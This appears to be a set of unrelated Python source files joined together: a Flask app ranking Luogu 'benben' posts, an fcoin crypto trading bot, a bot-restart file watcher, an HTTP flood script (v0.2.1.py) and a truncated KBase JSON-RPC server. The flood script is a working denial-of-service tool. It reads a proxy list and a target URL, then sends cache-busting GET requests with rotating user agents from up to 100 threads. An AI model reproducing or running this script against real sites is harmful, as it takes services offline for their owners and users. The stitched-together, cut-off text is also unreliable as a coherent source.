return redirect(url_for('user', uid=user.uid))
if not user.allow_paiming:
flash("该用户过分刷水被禁止排名和查询", 'danger')
return redirect(url_for('main'))
else:
flash("用户不存在或在服务器运行的时间内没有发过犇犇", 'danger')
return redirect(url_for('main'))
return render_template('zhuye.html', v=v, b=b.all(), form=form)
@app.route("/user/<int:uid>")
def user(uid):
cur = datetime.datetime.now()
u = LuoguUser.query.filter_by(uid=uid).first()
if not u:
flash("用户不存在或在服务器运行的时间内没有发过犇犇", 'danger')
return redirect(url_for('main'))
if not u.allow_paiming:
flash("该用户过分刷水被禁止排名和查询", 'danger')
return redirect(url_for('main'))
ph = u.beipohai
#print (u.allow_paiming)
u = u.benbens
v = BenBen.query.filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
BenBen.uid == uid
).count()
pm= BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True
).group_by(BenBen.uid).order_by(desc(func.count())).having(func.count()>v).count()
return render_template('main.html', benbens=u[:-101:-1], v=v, pm=pm+1, ph=ph,uid=uid)
@app.route("/help")
def help():
return render_template('help.html')
@app.route("/persecute", methods=["POST"])
@limiter.limit("8 per second")
def persecute():
uid = request.args['uid']
u = LuoguUser.query.filter_by(uid=uid).first_or_404()
u.beipohai += 1
phcs = u.beipohai
db.session.commit()
return str(phcs)
@app.route("/banned")
def banned():
users = LuoguUser.query.with_entities(
LuoguUser.uid, LuoguUser.username).filter_by(allow_paiming=False).all()
return jsonify(users)
@app.cli.command()
@click.option('--username', prompt=True, help='Username')
def fengjinyonghu(username):
click.echo('开始查询...')
u = LuoguUser.query.filter_by(username=username).first()
if not u:
click.echo('该用户不存在.')
return
click.echo('查询成功.')
if not u.allow_paiming:
click.echo('该用户已被限制')
return
click.echo('更改中...')
u.allow_paiming = False
db.session.add(u)
db.session.commit()
click.echo('成功.')
@app.cli.command()
@click.option('--username', prompt=True, help='Username')
def jiefengyonghu(username):
click.echo('开始查询...')
u = LuoguUser.query.filter_by(username=username).first()
if not u:
click.echo('该用户不存在.')
return
click.echo('查询成功.')
if u.allow_paiming:
click.echo('该用户没有被限制')
return
click.echo('更改中...')
u.allow_paiming = True
db.session.add(u)
db.session.commit()
click.echo('成功.')
@app.cli.command()
@click.option('--count', prompt=True)
def fakebenbens(count):
click.echo('开始生成')
count=int(count)
benbenslist=['I AK IOI','洛谷真棒!','咕咕咕','冒泡','kkkAKIOI']
userlist=LuoguUser.query.all()
for i in range (count):
b=random.choice(benbenslist)
user=random.choice(userlist)
abb = BenBen()
abb.text = b
abb.username = user.username
abb.uid = user.uid
abb.time = datetime.datetime.now()
user.benbens.append(abb)
db.session.add(abb)
db.session.commit()
click.echo("成功生成了一条")
@app.route("/ranklist")
def ranklist():
page = request.args.get('page', 1, type=int)
persecute = request.args.get('persecute', 0, type=int)
begin = request.args.get('begin', 0, type=int)
end = request.args.get('end', 0, type=int)
_contentOnly=request.args.get('_contentOnly',0,type=int)
if persecute:
p = LuoguUser.query.with_entities(LuoguUser.username,LuoguUser.uid,LuoguUser.beipohai).filter(LuoguUser.beipohai != 0,LuoguUser.allow_paiming == True).order_by(
desc(LuoguUser.beipohai)).paginate(page, per_page=20, error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('persecute.html', pagination=p, messages=p.items)
if begin != 0 and end != 0:
begin=datetime.datetime.fromtimestamp (begin)
end=datetime.datetime.fromtimestamp (end)
p = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'),
BenBen.username, BenBen.uid).filter(BenBen.time.between(begin, end),
LuoguUser.allow_paiming == True).group_by(BenBen.uid).order_by(desc(func.count())).paginate(page,
per_page=20,
error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('ranklisttime.html', pagination=p, messages=p.items,begin=begin,end=end)
cur = datetime.datetime.now()
p = BenBen.query.join(BenBen.user).with_entities(func.count().label('count'), BenBen.username, BenBen.uid).filter(
extract('year', BenBen.time) == cur.year,
extract('month', BenBen.time) == cur.month,
extract('day', BenBen.time) == cur.day,
LuoguUser.allow_paiming == True).group_by(BenBen.uid).order_by(desc(func.count())).paginate(page, per_page=20, error_out=False)
if _contentOnly==1:
return jsonify(p.items)
return render_template('ranklist.html', pagination=p, messages=p.items)
@app.route("/timequery", methods=["GET", "POST"])
def timequery():
class timequeryform (FlaskForm):
begin = DateTimeField('开始时间点', validators=[DataRequired()])
end = DateTimeField('结束时间点', validators=[DataRequired()])
submit = SubmitField('查询')
form = timequeryform()
if form.validate_on_submit():
return redirect("/ranklist?begin={}&end={}".format(int (time.mktime(form.begin.data.timetuple())),int (time.mktime(form.end.data.timetuple()))))
return render_template("timequery.html", form=form)
class ValidationError (ValueError):
pass
class CheckPaste ():
def __init__ (self):
pass
def __call__ (self,form,field):
t=field.data
if not re.match('^[a-z0-9]{8}',t) or len(t)!=8:
raise ValidationError('不符合洛谷云剪切板的格式')
return
headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
k=requests.get('https://www.luogu.com.cn/paste/{}?_contentOnly=1'.format(t),headers=headers)
t=k.json()
if t['code']==403:
raise ValidationError('这是一个非公开的剪贴板')
return
if t['code']==404:
raise ValidationError('这个剪贴板不存在')
return
cur = datetime.datetime.now()
cjsj=t['currentData']['paste']['time']
cjsj=datetime.datetime.fromtimestamp(cjsj)
if (cur-cjsj).days>=1:
raise ValidationError('这个剪贴板的创建时间过早')
return
if t['currentData']['paste']['user']['uid']!=int (form.luoguid.data):
raise ValidationError('创建者不是您')
return
text=t['currentData']['paste']['data']
if text!=form.username.data:
raise ValidationError('内容错误')
return
@app.route("/testpaste", methods=['GET', 'POST'])
def test_paste ():
class queryform (FlaskForm):
username = StringField(
'用户名', validators=[DataRequired(), Length(1, 20)])
luoguid = StringField(
'洛谷ID', validators=[DataRequired(), Length(1, 20)])
paste = StringField(
'剪贴板ID', validators=[DataRequired(), Length(1, 20),CheckPaste()])
submit = SubmitField('查询')
form=queryform()
if form.validate_on_submit():
return redirect('help')
return render_template("test_paste.html",form=form)
@app.route("/api/checkbenben")
def api_checkbenben():
uid=request.args.get('uid',-1,type=int)
headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
benbens = requests.get('https://www.luogu.com.cn/api/feed/list?user={}'.format(uid),headers=headers).json()
benbens=benbens['feeds']['result']
cur = datetime.datetime.now()
cnt=0
for i in benbens[::-1]:
text=markdown.markdown(i['content'])
username=i['user']['name']
stime=datetime.datetime.fromtimestamp(i['time'])
if BenBen.query.filter_by(uid=uid, time=stime).all():
continue
abb = BenBen()
abb.text = text.replace('<p>',"").replace('</p>',"")
abb.username = username
abb.uid = uid
abb.time = stime
user = LuoguUser.query.filter_by(uid=uid).first()
if user:
user.benbens.append(abb)
if user.username != username:
user.username = username
else:
user = LuoguUser(username=username, uid=uid)
db.session.add(user)
user.benbens.append(abb)
db.session.add(abb)
db.session.commit()
if stime.date() == cur.date():
cnt+=1
return str(cnt)
|
market_app.py
|
# !-*-coding:utf-8 -*-
# @TIME : 2018/6/11/0011 15:32
# @Author : Nogo
import math
import time
import talib
import numpy as np
import logging
from collections import defaultdict
from threading import Thread
from fcoin import Fcoin
from WSS.fcoin_client import fcoin_client
from balance import balance
import config
class market_app():
'''
订阅数据:历史成交trade,市价ticker
挂单条件:保存最新50个成交价格,排序取中间30个数据求和平均值与市价比较,差值在diff_price参数范围内则下单
说明:
1、运行脚本前手动清空持仓,脚本成交一个买单就按不小于买入价挂出。对挂出的卖单只做状态查询无其他操作。
2、设置好最大持仓量limit_amount,防止在盘口巨大波动时连续吃单
3、卖单长时间不成交需要手动清仓
'''
def __init__(self):
self.client = fcoin_client()
#self.client.stream.stream_depth.subscribe(self.depth)
#self.client.stream.stream_klines.subscribe(self.candle)
self.client.stream.stream_ticker.subscribe(self.ticker)
self.client.stream.stream_marketTrades.subscribe(self.trade)
self.fcoin = Fcoin()
self.fcoin.auth(config.key, config.secret)
self.buy_price = None # 买1价
self.buy_amount = None # 买1量
self.sell_price = None # 卖1价
self.sell_amount = None # 卖1量
self.ts = None # 深度更新时间
self.market_price = None # 市价
self.market_trade_list = None
self.total_bids = 0
self.total_asks = 0
self.filled_buy_order_list = []
self.order_list = defaultdict(lambda: None)
self.buy_order_id = None
self.dic_balance = defaultdict(lambda: None)
self.time_order = time.time()
self.price_list = []
self.candle_list = []
self.SMA = None
self._init_log()
# 日志初始化
def _init_log(self):
self._log = logging.getLogger(__name__)
self._log.setLevel(level=logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s') # 格式
'''
保存文档
'''
handler = logging.FileHandler("app.log")
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
self._log.addHandler(handler)
'''
控制台显示
'''
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(formatter)
self._log.addHandler(console)
# 精度控制,直接抹除多余位数,非四舍五入
def digits(self, num, digit):
site = pow(10, digit)
tmp = num * site
tmp = math.floor(tmp) / site
return tmp
# wss订阅深度接收
def depth(self, data):
bids = data['bids']
asks = data['asks']
self.ts = time.time()
self.buy_price = bids[0] # 买
self.buy_amount = bids[1]
self.sell_price = asks[0] # 卖
self.sell_amount = asks[1]
for i in range(3):
self.total_bids += bids[2 * i - 1]
self.total_asks += asks[2 * i - 1]
# wss订阅K线接收
def candle(self, data):
if len(self.candle_list) == 0:
self.candle_list = [{'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']}]
else:
last_candle = self.candle_list[-1]
if last_candle['timestamp'] == data['id']:
self.candle_list[-1] = {'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']}
else:
self.candle_list.append({'timestamp': data['id'],
'open': data['open'],
'high': data['high'],
'low': data['low'],
'close': data['close'],
'volume': data['base_vol']})
if len(self.candle_list) > 10:
self.candle_list.pop(0)
if len(self.candle_list) > 7:
close_array = np.array([item['close'] for item in self.candle_list])
self.SMA = talib.SMA(close_array, timeperiod=7)
# 市价
def ticker(self, data):
self.ts = time.time()
self.market_price = data['ticker'][0]
def trade(self, data):
self.ts = time.time()
price = float(data['price'])
if self.market_trade_list:
self.market_trade_list.append(price)
else:
self.market_trade_list = [price]
if len(self.market_trade_list) > 100:
self.market_trade_list.pop(0)
# 刷单流程
def process(self):
if self.market_trade_list and len(self.market_trade_list) < 100:
self._log.info('成交数据[%s]' % (len(self.market_trade_list)))
return
if self.ts and time.time() - self.ts < 10 and self.market_price:
price = self.market_price if config.fix_price == 0 else config.fix_price
amount = 0
'''
挂卖单
'''
success_item_list = []
for item in self.filled_buy_order_list:
amount = self.digits(item['amount'], config.symbol['amount_precision'])
price = self.digits(max(item['price'], price), config.symbol['price_precision'])
order = [amount, price]
if amount >= config.symbol['min_amount']:
success, data = self.fcoin.sell(config.symbol['name'], price, amount) # 卖
if success:
success_item_list.append(item)
self.order_list[data['data']] = order
self._log.info('挂卖单成功[%s:%s]' % (amount, price))
'''
删除已成功订单
'''
for item in success_item_list:
self.filled_buy_order_list.remove(item)
keys = []
for key in self.order_list.keys():
success, data = self.fcoin.get_order(key)
if success:
state = data['data']['state']
if state == 'filled':
keys.append([0, key])
elif state in ('partial_canceled', 'canceled'):
keys.append([1, key])
for tag, key in keys:
self.order_list.pop(key)
if tag == 0:
self._log.info('已经成交:' + key)
else:
self._log.info('已经撤单:' + key)
'''
买单不存在时
'''
if not self.buy_order_id:
'''
查询余额度
'''
self.dic_balance = self.get_balance()
'''
判断币种持仓量,到设定值停止买入。
'''
coin = self.dic_balance[config.symbol['coin']]
if coin and coin.balance > config.limit_amount:
self._log.info('%s余额度达到最大值[%s]' % (config.symbol['coin'], coin.balance))
return
'''
挂买单
'''
usdt = self.dic_balance['usdt']
if usdt:
tmp_list = self.market_trade_list.copy()
tmp_list.sort()
avg = sum(tmp_list[10:-10])/(len(tmp_list)-20)
diff = abs(avg - self.market_price)
if config.diff_price < diff:
self._log.info('固定价格模式差价异常[%-0.2f]' % diff)
return
price = self.market_price if config.fix_price == 0 else config.fix_price
if usdt.available > price * config.max_amount:
amount = config.max_amount if self.total_bids > config.total_amount and self.total_asks > config.total_amount else config.min_amount
else:
amount = usdt.available / price
amount = self.digits(amount, config.symbol['amount_precision'])
if amount >= config.symbol['min_amount']:
price = self.digits(price, config.symbol['price_precision'])
success, data = self.fcoin.buy(config.symbol['name'], price, amount) # 买
if success:
self.time_order = time.time()
self.buy_order_id = data['data']
self._log.info('挂买单成功[%s:%s]' % (amount, price))
else:
self._log.info('usdt不足[%s]' % (usdt.available))
else:
self._log.info('查询余额错误')
else:
'''
买单ID存在时查询订单状态
'''
success, data = self.fcoin.get_order(self.buy_order_id)
if success:
state = data['data']['state']
amount = float(data['data']['filled_amount']) - float(data['data']['fill_fees'])
price = float(data['data']['price'])
if amount > 0 and state in ('filled', 'partial_canceled'):
self.filled_buy_order_list.append({'price': price, 'amount': amount})
if state == 'filled':
self.buy_order_id = None
self._log.info('买单已成交')
elif state == 'canceled' or state == 'partial_canceled':
self.buy_order_id = None
self._log.info('买单已撤单')
elif state not in ('pending_cancel'):
'''
超时判断
'''
if time.time() - self.time_order >= config.delay:
self.fcoin.cancel_order(self.buy_order_id)
self._log.info('%s秒超时撤单' % config.delay)
else:
self._log.info('等待WebSocket数据……')
# 循环
def loop(self):
if config.max_amount < config.symbol['min_amount'] or config.min_amount < config.symbol['min_amount']:
self._log.info('max_amount,min_amount ≥ 规定的最小数量[%s]' % (config.symbol['min_amount']))
return
self.client.start()
while not self.client.isConnected:
self._log.info('waitting……')
time.sleep(1)
#self.client.subscribe_depth(config.symbol['name'], 'L20')
#self.client.subscribe_candle(config.symbol['name'], 'M1')
self.client.subscribe_ticker(config.symbol['name'])
self.client.subscribe_trade(config.symbol['name'])
while True:
try:
self.process()
except Exception as error:
self._log.info('未知错误')
time.sleep(1)
# 获取余额
def get_balance(self):
dic_balance = defaultdict(lambda: None)
success, data = self.fcoin.get_balance()
if success:
for item in data['data']:
dic_balance[item['currency']] = balance(float(item['available']), float(item['frozen']),
float(item['balance']))
return dic_balance
# 获取订单
def get_orders(self, symbol, states, limit=1):
'''
:param symbol:
:param states: submitted/partial_filled/partial_canceled/canceled/pending_cancel/filled
:return:
'''
success, data = self.fcoin.list_orders(symbol=symbol, states=states, limit=limit)
if success:
return data['data']
else:
print(data)
return None
if __name__ == '__main__':
run = market_app()
thread = Thread(target=run.loop)
thread.start()
thread.join()
print('done')
|
doms_runner.py
|
from subprocess import Popen, PIPE, TimeoutExpired
import threading
import sys
import time
import atexit
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
import datetime
import psutil
import os
SUBPROCESS_COMMAND = 'python runner.py'
SUBPROCESS_CWD = os.path.realpath(os.path.dirname(__file__))
child_process = None
import psutil
def start_rl_bot():
global child_process
global read_out
global read_err
if child_process:
kill_proc_tree(child_process.pid)
child_process = Popen(
SUBPROCESS_COMMAND,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
shell=True,
cwd=SUBPROCESS_CWD,
)
atexit.register(lambda: child_process.kill()) # behave like a daemon
read_out = threading.Thread(target=print_file, args=[child_process.stdout], daemon=True)
read_out.start()
read_err = threading.Thread(target=print_file, args=[child_process.stderr], daemon=True)
read_err.start()
def KILL(process):
try:
process.kill()
except psutil._exceptions.NoSuchProcess as e:
return
def kill_proc_tree(pid):
parent = psutil.Process(pid)
children = parent.children(recursive=True)
KILL(parent) # THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE
for child in children: # THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE
KILL(child) # THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE THIS CAN NOT CONTINUE
gone, still_alive = psutil.wait_procs(children, timeout=5)
def print_file(f):
for line in f:
line = line.decode('utf-8')
if line.strip() == 'Process Process-1:':
continue
print(line.rstrip())
sys.stdout.flush()
class MyEventHandler(LoggingEventHandler):
def __init__(self):
self.last_modified = datetime.datetime.now()
def on_modified(self, event):
if event.src_path.startswith('.\\.git'): return
if '\\__pycache__' in event.src_path: return
if event.src_path.startswith('.\\bot_code\\training'): return
now = datetime.datetime.now()
if now - self.last_modified < datetime.timedelta(seconds=0.5):
return
self.last_modified = now
global child_process
print("File modified:", event.src_path.lstrip('.\\/'))
print()
sys.stdout.flush()
start_rl_bot()
def on_created(self, event):
pass
def on_deleted(self, event):
pass
def on_moved(self, event):
pass
if __name__ == "__main__":
start_rl_bot()
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
event_handler = MyEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(.1)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
v0.2.1.py
|
#!/usr/bin/env python
#version: 0.2
import threading
import random
import logging
import socket
import socks
import time
import sys
import ssl
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S"
)
logger = logging.getLogger(__name__)
if "debug" in sys.argv or "d" in sys.argv:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
proxy_types = ["http", "socks4", "socks5"]
while True:
try:
proxy_list = open(input("Proxy List: "), "r")
proxies = proxy_list.readlines()
proxy_list.close()
break
except KeyboardInterrupt:
sys.exit()
except FileNotFoundError:
logger.info(f"Proxy list file not found. Try again!")
pass
except Exception as e:
logger.info(f"Unable to open/read proxy list file: {e}")
pass
while True:
try:
proxy_type = input("Proxy Type: ")
if not proxy_type in proxy_types:
raise ValueError("Invalid proxy type")
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"Proxy Type Error: {e}")
pass
#Set as global variables for faster data processing
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = list(chars)
context = ssl.create_default_context()
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"msnbot-131-253-46-102.search.msn.com",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
active_threads = 0
max_threads = 100
sockets = 0
min_sockets = 30
hrs = 0
def urlsplit(url):
try:
url = url.strip()
try:
protocol, host = url.split("://", 1)
host = host.strip()
if len(host) == 0:
raise Exception("Missing URL host")
except ValueError:
raise Exception("Missing URL protocol")
try:
host, path = host.split("/", 1)
except ValueError:
path = ""
try:
host, port = host.split(":", 1)
except ValueError:
port = 80
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = ""
path = f"/{path}"
try:
port = int(port)
except ValueError:
raise Exception("Invalid URL port value")
url_dict = {
"protocol": protocol,
"host": host,
"port": port,
"path": path,
"parameters": parameters
}
return url_dict
except Exception as e:
raise Exception(e)
pass
def hflood(url, **kwargs):
try:
global active_threads
global sockets
global hrs
active_threads += 1
logger.debug(f"Thread {active_threads} started")
kwargs.setdefault("timeout", 10)
kwargs.setdefault("proxy", None)
kwargs.setdefault("delay", 1)
use_proxy = False
socket_connected = False
timeout = int(kwargs["timeout"])
delay = int(kwargs["delay"])
proxy = kwargs["proxy"]
if proxy:
use_proxy = True
if proxy:
proxy = urlsplit(proxy)
url = urlsplit(url)
protocol = url["protocol"]
host = url["host"]
port = url["port"]
path = url["path"]
parameters = url["parameters"]
socket.setdefaulttimeout(timeout)
if use_proxy:
proxy_type = getattr(socks, proxy["protocol"].upper())
proxy_host = proxy["host"]
proxy_port = proxy["port"]
if protocol == "https":
port = 443
port = int(port)
proxy_port = int(proxy_port)
if protocol == "https":
if use_proxy:
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock = context.wrap_socket(sock, server_hostname=host)
else:
if use_proxy:
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
logger.debug(f"Socket connected: {sockets}")
socket_connected = True
sockets += 1
while True:
anti_cache = random.choices(chars_list, k=77)
anti_cache = "".join(anti_cache)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}&{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\n\r\n"
while True:
if sockets >= min_sockets:
break
sent = sock.send(http.encode())
logger.debug(f"Sent {sent} bytes")
hrs += 1
time.sleep(delay)
except Exception as e:
logger.debug(f"hflood error: {e}")
pass
finally:
active_threads -= 1
if socket_connected:
sockets -= 1
def info():
global hrs
while True:
print(f"Threads: {active_threads} HR/s: {hrs} Sockets: {sockets}")
hrs = 0
time.sleep(1)
while True:
try:
url = input("URL: ")
urlsplit(url)
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"url error: {e}")
pass
threading.Thread(target=info, daemon=True).start()
try:
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy = f"{proxy_type}://{proxy}"
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=hflood, args=[url], kwargs={"proxy": proxy}, daemon=True).start()
break
except KeyboardInterrupt:
sys.exit()
except Exception as e:
logger.info(f"Main Error: {e}")
pass
|
kb_functional_enrichment_1Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_functional_enrichment_1.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_functional_enrichment_1'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_functional_enrichment_1.kb_functional_enrichment_1Impl import kb_functional_enrichment_1 # noqa @IgnorePep8
impl_kb_functional_enrichment_1 = kb_functional_enrichment_1(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_functional_enrichment_1'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
